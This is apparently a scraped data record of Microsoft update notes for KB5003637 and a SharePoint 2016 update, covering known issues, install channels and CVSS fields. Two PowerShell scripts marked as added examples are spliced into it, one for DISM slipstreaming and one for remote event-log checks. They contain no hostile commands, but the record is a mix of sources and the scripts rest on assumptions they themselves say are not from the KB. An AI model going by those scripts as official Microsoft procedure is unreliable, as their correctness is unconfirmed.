Extract the SSU from the previously extracted cab via this command line: **expand Windows10.0-KB5000842-x64.cab /f:* <destination path>**\n 3. You will then have the SSU cab, in this example named **SSU-19041.903-x64.cab**. Slipstream this file into your offline image first, then the LCU.\nIf you have already encountered this issue by installing the OS using affected custom media, you can mitigate it by directly installing the [new Microsoft Edge](<https://www.microsoft.com/edge>). If you need to broadly deploy the new Microsoft Edge for business, see [Download and deploy Microsoft Edge for business](<https://www.microsoft.com/edge/business/download>). \nAfter installing this or later updates, apps accessing event logs on remote devices might be unable to connect. This issue might occur if the local or remote device has not yet installed updates released June 8, 2021 or later. Affected apps are using certain [legacy Event Logging APIs](<https://docs.microsoft.com/en-us/windows/win32/eventlog/event-logging-reference>). You might receive an error when attempting to connect, for example:\n\n * error 5: access is denied\n * error 1764: The requested operation is not supported.\n * System.InvalidOperationException, \nMicrosoft.PowerShell.Commands.GetEventLogCommand\n * Windows has not provided an error code.\n**Note** Event Viewer and other apps using current non-legacy APIs to access event logs should not be affected.| This is expected due to security hardening changes relating to [Event Tracing for Windows (ETW)](<https://docs.microsoft.com/en-us/windows/win32/etw/event-tracing-portal>) for [CVE-2021-31958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31958>). This issue is resolved if the local and remote devices both have installed updates released June 8, 2021 or later. 
\nAfter installing this update or later, the news and interests button in the Windows taskbar might have blurry text on certain display configurations.| This issue is resolved in KB5003690. \nAfter installing this update, Internet Explorer 11 (IE11) or apps using the 64-bit version of the WebBrowser control might fail to open PDFs or may render as just a gray background using the Adobe Acrobat plug-in.**Note **Internet Explorer is only affected if **Enable 64-bit Processes for Enhanced Protected Mode** is enabled in the **Advanced** tab in **Internet Options**.| This issue is resolved in KB5004760. \n \n## How to get this update\n\n**Before installing this update**Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.Prerequisite:For Windows Server Update Services (WSUS) deployment:\n\n * Install the May 11, 2021 update (KB5003173) before you install the latest cumulative update.\nFor offline Deployment Image Servicing and Management (**DISM.exe**) deployment:\n\n * If an image does not have the February 24, 2021 (KB4601382) or later cumulative update, install the January 12, 2021 SSU (KB4598481) and the May 11, 2021 update (KB5003173).\n**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. 
\nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5003637>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n \n**If you want to remove the LCU**To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**.Running [Windows Update Standalone Installer](<https://support.microsoft.com/en-us/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall **switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.\n\n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5003637](<https://download.microsoft.com/download/6/a/0/6a0b9a84-d94b-426b-926f-2be0af9901b6/5003637.csv>). For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 19041.1022, 19042.1022, and 19043.1022](<https://download.microsoft.com/download/d/b/e/dbed46a6-e743-4aeb-b2a1-202c3dbe383e/SSU_version_19041.1022.csv>). 
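
The custom-media workaround above (expand the combined .msu to its .cab, expand the SSU cab out of that, slipstream the SSU first and the LCU second) as a single PowerShell script. This is an added example, not Microsoft's own tooling: the package and mount paths are placeholders, the SSU cab is assumed to match SSU-*.cab as in the KB5000842 example, the extracted outer .cab is assumed to be the LCU package that is added second, and the optional SHA256 check mirrors the "File hash information" the SharePoint KB entries publish (the Windows KB entries above do not list a hash for the .msu, so pass -ExpectedSha256 only if you have one from the Update Catalog).

```powershell
<#
  Slipstream-CombinedUpdate.ps1 (added example; not Microsoft's script)
  Follows the workaround in the known-issues table above for custom offline
  media: expand the combined .msu to its .cab, pull the SSU cab out of it,
  add the SSU to the mounted image first, then the LCU.
  Assumptions not taken from the KB: the .msu and mount paths, that the SSU
  cab is named SSU-*.cab, and that the extracted outer .cab is used as the
  LCU package. -ExpectedSha256 is optional.
  Run from an elevated PowerShell prompt with the image already mounted
  (DISM /Mount-Image).
#>
[CmdletBinding()]
param(
    [Parameter(Mandatory)] [string] $MsuPath,    # e.g. C:\Updates\Windows10.0-KB5000842-x64.msu (placeholder)
    [Parameter(Mandatory)] [string] $MountDir,   # mount point of the offline image (placeholder)
    [string] $WorkDir = (Join-Path $env:TEMP 'ssu-extract'),
    [string] $ExpectedSha256                      # published SHA256 of the .msu, if you have one
)

$ErrorActionPreference = 'Stop'

function Test-PackageHash {
    # $true when the file's SHA256 equals the published one (or when none was supplied).
    param([string] $Path, [string] $Expected)
    if ([string]::IsNullOrWhiteSpace($Expected)) { return $true }
    $actual = (Get-FileHash -Path $Path -Algorithm SHA256).Hash
    return $actual -ieq $Expected
}

function Invoke-Expand {
    # Wrapper around the built-in expand.exe that turns a non-zero exit code into an error.
    param([string] $Source, [string] $Filter, [string] $Dest)
    & expand.exe $Source "/f:$Filter" $Dest | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "expand.exe failed: $Source ($Filter)" }
}

function Expand-CombinedPackage {
    # Returns the SSU cab and the outer (LCU) cab extracted from a combined SSU+LCU .msu.
    param([string] $Msu, [string] $Dest)
    New-Item -ItemType Directory -Force -Path $Dest | Out-Null
    $cabName  = [IO.Path]::GetFileNameWithoutExtension($Msu) + '.cab'
    $outerCab = Join-Path $Dest $cabName
    Invoke-Expand -Source $Msu -Filter $cabName -Dest $Dest   # step 1: .msu -> .cab
    Invoke-Expand -Source $outerCab -Filter '*' -Dest $Dest   # step 2: .cab -> SSU-<build>-x64.cab and the rest
    $ssu = Get-ChildItem -Path $Dest -Filter 'SSU-*.cab' | Select-Object -First 1
    if (-not $ssu) { throw "No SSU-*.cab inside $Msu; is this really a combined SSU+LCU package?" }
    [pscustomobject]@{ Ssu = $ssu.FullName; Lcu = $outerCab }
}

function Add-ImagePackage {
    param([string] $Mount, [string] $Package)
    & dism.exe "/Image:$Mount" /Add-Package "/PackagePath:$Package" | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "DISM /Add-Package failed for $Package" }
}

if (-not (Test-PackageHash -Path $MsuPath -Expected $ExpectedSha256)) {
    throw "SHA256 of $MsuPath does not match the published hash; not slipstreaming it"
}
$pkgs = Expand-CombinedPackage -Msu $MsuPath -Dest $WorkDir
Write-Host "SSU cab: $($pkgs.Ssu)"
Add-ImagePackage -Mount $MountDir -Package $pkgs.Ssu   # SSU first ...
Add-ImagePackage -Mount $MountDir -Package $pkgs.Lcu   # ... then the LCU
# List what the image now contains so the SSU and LCU package identities can be checked.
& dism.exe "/Image:$MountDir" /Get-Packages | Select-String 'Package Identity'
```

The hash check runs before anything is expanded so a tampered or corrupted download never reaches the image; the order of the two Add-ImagePackage calls is the whole point of the workaround, since adding the LCU before the SSU is what leaves Edge Legacy removed without the new Edge in place.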
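
The remote event-log known issue (listed above for both the version 1909 and the 2004/20H2/21H1 updates) turned into a check a practitioner can run. This is an added example, not Microsoft's code: it assumes WinRM is enabled on the remote host (Invoke-Command is used to read its build number), and the build/UBR thresholds are the OS builds named in the KB titles above (18363.1621 for 1909, 19041.1052/19042.1052/19043.1052 for 2004/20H2/21H1). Get-EventLog, named in the error text above, goes through the legacy Event Logging API that the CVE-2021-31958 hardening restricts; Get-WinEvent uses the current Windows Event Log API and is not affected, so the reader below warns when only one side is patched and always reads through Get-WinEvent.

```powershell
<#
  Added example (not Microsoft's code) for the remote event-log known issue above.
  Get-EventLog uses the legacy Event Logging API and fails (error 5 / 1764 /
  InvalidOperationException) when only one end of the connection has the
  June 8, 2021 update; Get-WinEvent uses the current Windows Event Log API and
  is unaffected. Assumptions not taken from the page: WinRM is enabled on the
  remote host, and the four builds below are the only ones you care about.
#>
$script:June2021Ubr = @{
    '18363' = 1621   # Windows 10, version 1909 (KB5003635, OS Build 18363.1621)
    '19041' = 1052   # Windows 10, version 2004 (KB5003637, OS Build 19041.1052)
    '19042' = 1052   # Windows 10, version 20H2 (KB5003637, OS Build 19042.1052)
    '19043' = 1052   # Windows 10, version 21H1 (KB5003637, OS Build 19043.1052)
}

function Get-OsBuild {
    # Returns CurrentBuild and UBR (update build revision) of a local or remote machine.
    param([string] $ComputerName = $env:COMPUTERNAME)
    $sb = {
        $k = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
        [pscustomobject]@{ Build = [string]$k.CurrentBuild; Ubr = [int]$k.UBR }
    }
    if ($ComputerName -ieq $env:COMPUTERNAME) { & $sb }
    else { Invoke-Command -ComputerName $ComputerName -ScriptBlock $sb }   # assumes WinRM
}

function Test-HasJune2021Update {
    # $true/$false when the build is one of the four above, $null when the build is not covered.
    param($Os)
    $min = $script:June2021Ubr[$Os.Build]
    if ($null -eq $min) { return $null }
    return $Os.Ubr -ge $min
}

function Get-RemoteSystemEvents {
    param([Parameter(Mandatory)] [string] $ComputerName, [int] $MaxEvents = 25)
    $local  = Test-HasJune2021Update (Get-OsBuild)
    $remote = Test-HasJune2021Update (Get-OsBuild -ComputerName $ComputerName)
    if ($null -ne $local -and $null -ne $remote -and $local -ne $remote) {
        Write-Warning "Only one side has the June 2021 update; Get-EventLog -ComputerName $ComputerName would fail (error 5/1764). Patch both sides."
    }
    # Non-legacy path: Critical (1) and Error (2) events from the remote System log.
    Get-WinEvent -ComputerName $ComputerName -FilterHashtable @{ LogName = 'System'; Level = 1, 2 } -MaxEvents $MaxEvents
}

# Usage (hypothetical host name):
# Get-RemoteSystemEvents -ComputerName 'srv01' | Format-Table TimeCreated, Id, ProviderName, Message -AutoSize
```

The build comparison is used instead of Get-HotFix on purpose: once a later cumulative update is installed, KB5003635/KB5003637 no longer appear in the hotfix list, but the UBR only ever moves forward, so "UBR at or above the June 2021 value" stays a reliable answer.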
\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mskb", "title": "June 8, 2021\u2014KB5003637 (OS Builds 19041.1052, 19042.1052, and 19043.1052)\n", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31958", "CVE-2021-33739"], "modified": "2021-06-08T07:00:00", "id": "KB5003637", "href": "https://support.microsoft.com/en-us/help/5003637", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-15T10:41:46", "description": "None\n## Summary\n\nThis security update resolves a Microsoft SharePoint remote code execution vulnerability, SharePoint spoofing vulnerability, SharePoint Server information disclosure vulnerability, and SharePoint Server remote code execution vulnerability. 
To learn more about the vulnerabilities, see the following security advisories:\n\n * [Microsoft Common Vulnerabilities and Exposures CVE-2021-26420](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26420>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2021-31948](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31948>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2021-31950](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31950>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2021-31963](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31963>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2021-31964](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31964>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2021-31965](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31965>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2021-31966](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31966>)\n\n**Note: **To apply this security update, you must have the release version of Microsoft SharePoint Enterprise Server 2016 installed on the computer.\n\nThis public update delivers Feature Pack 2 for SharePoint Server 2016. Feature Pack 2 contains the following feature:\n\n * SharePoint Framework (SPFx)\nThis public update also delivers all the features that were included in Feature Pack 1 for SharePoint Server 2016, including:\n * Administrative Actions Logging\n * MinRole enhancements\n * SharePoint Custom Tiles\n * Hybrid Taxonomy\n * OneDrive API for SharePoint on-premises\n * OneDrive for Business modern user experience (available to Software Assurance customers)\nThe OneDrive for Business modern user experience requires an active Software Assurance contract at the time that the experience is enabled, either by installation of the public update or by manual enablement. 
If you don't have an active Software Assurance contract at the time of enablement, you must turn off the OneDrive for Business modern user experience.For more information, see the following Microsoft Docs articles:\n * [New features included in the November 2016 Public Update for SharePoint Server 2016 (Feature Pack 1)](<https://go.microsoft.com/fwlink/?linkid=832679>)\n * [New features included in the September 2017 Public Update for SharePoint Server 2016 (Feature Pack 2)](<https://go.microsoft.com/fwlink/?linkid=856819>)\n\n## Improvements and fixes\n\nThis update contains security and reliability improvements.This security update also contains fixes and improvements for the following nonsecurity issues in SharePoint Server 2016:\n\n * Improves the performance of certain database operations that are done by the SharePoint Products Configuration Wizard (PSConfig), Timer service jobs, and other features.\n * Fixes an issue in which you receive the following error message when you try to clear a filter by using indexed columns in a SharePoint list that has many items: \n**Cannot show the value of the filter. The field may not be filterable, or the number of items returned exceeds the list view threshold enforced by the administrator.**\n * Fixes an issue in which Web Parts that depend on **WPProperty **don't work correctly. To enable the Web Parts to work, you have to also follow the steps that are provided in KB 5003528 to declare the affected .NET types to be allowed to access **WPProperty **in the Web.config file.\nThis security update also contains a fix for the following nonsecurity issue in Project Server 2016. Consider the following scenario:\n * On a task, you set the Status Manager.\n * You publish the project.\n * Later, while in the same editing session, you change the Status Manager settings.\n * You publish the project.\nIn this situation, the Status Manager property does not get updated in reporting. 
Instead of reflecting the new Status Manager, the old one is still observed.\n\n## Known issues in this update\n\n * **DataFormWebPart **may be blocked from accessing an external URL, and it generates \"8scdc\"event tags in SharePoint Unified Logging System (ULS) logs. For more information, see KB 5004210.\n * When third-party assemblies try to access some sensitive properties, user code might be blocked. When this issue occurs, \u201c8gaol\u201d event entries are logged in SharePoint Unified Logging System (ULS) logs. For example, you may find the following entry in ULS logs: \n \n**8gaol Unable to access this sensitive property : <sensitive property name> from outer assembly.**To fix this issue, install KB5002002 and follow the guidance in KB5004581 to enable trusted third-party assemblies.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB5001946>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through th